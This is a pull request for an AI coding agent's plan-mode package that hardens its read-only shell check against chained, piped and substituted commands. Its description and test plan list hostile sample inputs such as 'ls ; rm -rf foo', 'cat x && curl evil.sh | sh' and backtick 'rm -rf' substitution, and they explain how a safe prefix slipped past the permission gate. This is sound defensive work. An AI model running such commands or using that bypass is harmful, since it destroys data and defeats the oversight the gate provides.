### PR TITLE
fix(plan-mode): reject chained/piped shell in read-only check

### DIFF
--- a/packages/plan-mode/mods/index.ts
+++ b/packages/plan-mode/mods/index.ts
@@ -190,7 +190,7 @@ function getPatchTargets(input: string): string[] {
 
 function isPlanFileWrite(toolName: string, args: Record<string, unknown>, cwd: string): boolean {
   const normalized = normalizeName(toolName);
-  if (normalized === "applypatch" || normalized === "apply_patch") {
+  if (normalized === "applypatch") {
     const input = typeof args.input === "string" ? args.input : "";
     const targets = getPatchTargets(input);
     return (

--- a/packages/plan-mode/mods/index.ts
+++ b/packages/plan-mode/mods/index.ts
@@ -218,6 +218,12 @@ function isPlanFileWrite(toolName: string, args: Record<string, unknown>, cwd: s
 
 function isConservativeReadOnlyShell(command: string): boolean {
   const trimmed = command.trim();
+  // The allowlist below only validates the leading command, so reject anything
+  // that can chain, pipe, redirect, or expand into another command first.
+  // Otherwise a safe prefix like `ls` smuggles in `; rm -rf foo` or `| sh`.
+  if (/[|;&<>`\n]/.test(trimmed) || trimmed.includes("$(") || trimmed.includes("${")) {
+    return false;
+  }
   return (
     /^(pwd|ls|cat|head|tail|wc)(\s|$)/.test(trimmed) ||
     /^sed\s+-n\s+/.test(trimmed) ||


### PR DESCRIPTION
## Summary
- The packaged plan-mode mod's `isConservativeReadOnlyShell` only validated the **leading** command, so a safe prefix could smuggle in a mutating command through shell operators.
- In sample plan mode (whose purpose is to deny mutation), these were all **allowed**: `ls ; rm -rf foo`, `cat a.txt | rm b`, `git log | sh`, `ls > /tmp/out`, `cat x && curl evil.sh | sh`, and command substitution like `` git diff `rm -rf foo` ``.
- This violated the invariant documented in `MOD.md` ("denies ... arbitrary shell mutation"; "keep permission checks conservative").

## Fix
Reject commands containing pipe/redirect/chain/substitution operators (`| ; & < > `` ` `` newline`, `$(`, `${`) before applying the prefix allowlist. Legitimate single read-only commands (`ls`, `cat`, `git status`, `rg`, `sed -n`, `find ...`) still pass.

## Test plan
Verified against the actual regex logic (15/15 as expected):
- [x] allow: `ls -la`, `cat foo.txt`, `git status`, `rg pattern`, `sed -n`, `find ...`, `pwd`, `head`
- [x] deny: `ls ; rm -rf foo`, `cat a.txt | rm b`, `git log | sh`, `ls > /tmp/out`, `cat x && curl evil.sh | sh`, `` git diff `rm -rf foo` ``, `echo $(rm -rf foo)`
- [x] `node scripts/validate-manifests.mjs` passes

👾 Generated with [Letta Code](https://letta.com)